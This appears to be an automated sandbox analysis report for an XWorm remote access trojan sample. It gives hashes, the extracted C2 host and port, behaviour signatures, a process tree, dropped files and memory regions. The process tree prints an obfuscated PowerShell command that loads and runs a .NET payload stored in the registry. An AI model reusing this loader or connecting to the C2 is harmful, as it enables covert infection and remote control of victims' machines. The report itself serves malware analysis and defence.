Analysis
-
max time kernel
60s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
01-07-2024 17:40
General
-
Target
x4svchost.exe
-
Size
762KB
-
MD5
148ec472df90b0fb274c3ce2ad2e811f
-
SHA1
378ba02b08494b36ff5a2674cf99eba6c7025d6a
-
SHA256
a08b846be9052a2614ef6a6920260d465774f5da9926f6d08449a2e4eb27b787
-
SHA512
ab6764b598d538bc726a1e0baf02c8c4a2ccdedf77ff6b3ee63d1e27c0a05e13423142b86f38afbd9462c0d90b5c3a9963a30e110145aca455ffa5403375c5b1
-
SSDEEP
12288:0sjApTtnb0TbQxMM90CL7VmADH2eJGCOTJfVXwAfIXZqPtbxZWdezgrrNo02UBYW:djuTt4TbQRjDH2eJQTNqcWOVZK1y02UH
Score
10/10
Malware Config
Extracted
Family
xworm
C2
session-chief.gl.at.ply.gg:36125
Attributes
-
Install_directory
%LocalAppData%
-
install_file
x4usb.exe
Signatures
-
Detect Xworm Payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Executes dropped EXE 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9105bb3f-5047-4b83-b5b0-4e0077a03796}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {B0AEA794-863D-4A0B-8EDA-068C24AE98F6} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](120)+''+[Char](52)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\x4svchost.exe"C:\Users\Admin\AppData\Local\Temp\x4svchost.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\x4host.exe"C:\Users\Admin\AppData\Local\Temp\x4host.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1362757830-21384515393198194417472438931599184708161984345819503547441451025981"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exeFilesize
731KB
MD5851be4e85b0f111883680e87099483a3
SHA1155e19ad0d2ec4bef3ba25512b6e8bc403350ec9
SHA256ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197
SHA512bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6
-
C:\Users\Admin\AppData\Local\Temp\x4host.exeFilesize
68KB
MD5fd744070409a72b86cc2b344d1719b33
SHA1d58ded881812057a3b51e6f753ffbfe243af112e
SHA256d2fd71588dd2d33c5ad58c1a5382de38227ad86092cae7401ee95c7701282730
SHA5128ebde5880105f2831377c26800fdd2b482bd2fdfc5c5539ce0901828d78bd1d2475474cc5859e3a0f92a305a21bd3c1c98834e1746402d708e84622e088717d9
-
memory/424-46-0x0000000000B90000-0x0000000000BB6000-memory.dmpFilesize
152KB
-
memory/424-48-0x0000000000B90000-0x0000000000BB6000-memory.dmpFilesize
152KB
-
memory/424-49-0x0000000000C40000-0x0000000000C6C000-memory.dmpFilesize
176KB
-
memory/424-50-0x0000000000C40000-0x0000000000C6C000-memory.dmpFilesize
176KB
-
memory/424-56-0x0000000000C40000-0x0000000000C6C000-memory.dmpFilesize
176KB
-
memory/424-57-0x000007FEBE200000-0x000007FEBE210000-memory.dmpFilesize
64KB
-
memory/424-58-0x00000000371E0000-0x00000000371F0000-memory.dmpFilesize
64KB
-
memory/476-72-0x00000000371E0000-0x00000000371F0000-memory.dmpFilesize
64KB
-
memory/476-71-0x000007FEBE200000-0x000007FEBE210000-memory.dmpFilesize
64KB
-
memory/476-70-0x0000000000C50000-0x0000000000C7C000-memory.dmpFilesize
176KB
-
memory/476-64-0x0000000000C50000-0x0000000000C7C000-memory.dmpFilesize
176KB
-
memory/492-78-0x00000000000E0000-0x000000000010C000-memory.dmpFilesize
176KB
-
memory/492-84-0x00000000000E0000-0x000000000010C000-memory.dmpFilesize
176KB
-
memory/492-85-0x000007FEBE200000-0x000007FEBE210000-memory.dmpFilesize
64KB
-
memory/492-86-0x00000000371E0000-0x00000000371F0000-memory.dmpFilesize
64KB
-
memory/2344-29-0x0000000000400000-0x00000000004B9000-memory.dmpFilesize
740KB
-
memory/2344-22-0x0000000000390000-0x00000000003F7000-memory.dmpFilesize
412KB
-
memory/2344-11-0x0000000000390000-0x00000000003F7000-memory.dmpFilesize
412KB
-
memory/2344-10-0x0000000000400000-0x00000000004B9000-memory.dmpFilesize
740KB
-
memory/2672-36-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-35-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-42-0x0000000076F80000-0x000000007709F000-memory.dmpFilesize
1.1MB
-
memory/2672-43-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-41-0x00000000771A0000-0x0000000077349000-memory.dmpFilesize
1.7MB
-
memory/2672-38-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-37-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2708-30-0x000000001A110000-0x000000001A3F2000-memory.dmpFilesize
2.9MB
-
memory/2708-34-0x0000000076F80000-0x000000007709F000-memory.dmpFilesize
1.1MB
-
memory/2708-33-0x00000000771A0000-0x0000000077349000-memory.dmpFilesize
1.7MB
-
memory/2708-32-0x00000000013B0000-0x00000000013DA000-memory.dmpFilesize
168KB
-
memory/2708-31-0x0000000000870000-0x0000000000878000-memory.dmpFilesize
32KB
-
memory/2884-0-0x000007FEF5543000-0x000007FEF5544000-memory.dmpFilesize
4KB
-
memory/2884-25-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmpFilesize
9.9MB
-
memory/2884-4-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmpFilesize
9.9MB
-
memory/2884-1-0x0000000000B40000-0x0000000000C04000-memory.dmpFilesize
784KB
-
memory/2932-23-0x000007FEF5543000-0x000007FEF5544000-memory.dmpFilesize
4KB
-
memory/2932-24-0x0000000001140000-0x0000000001158000-memory.dmpFilesize
96KB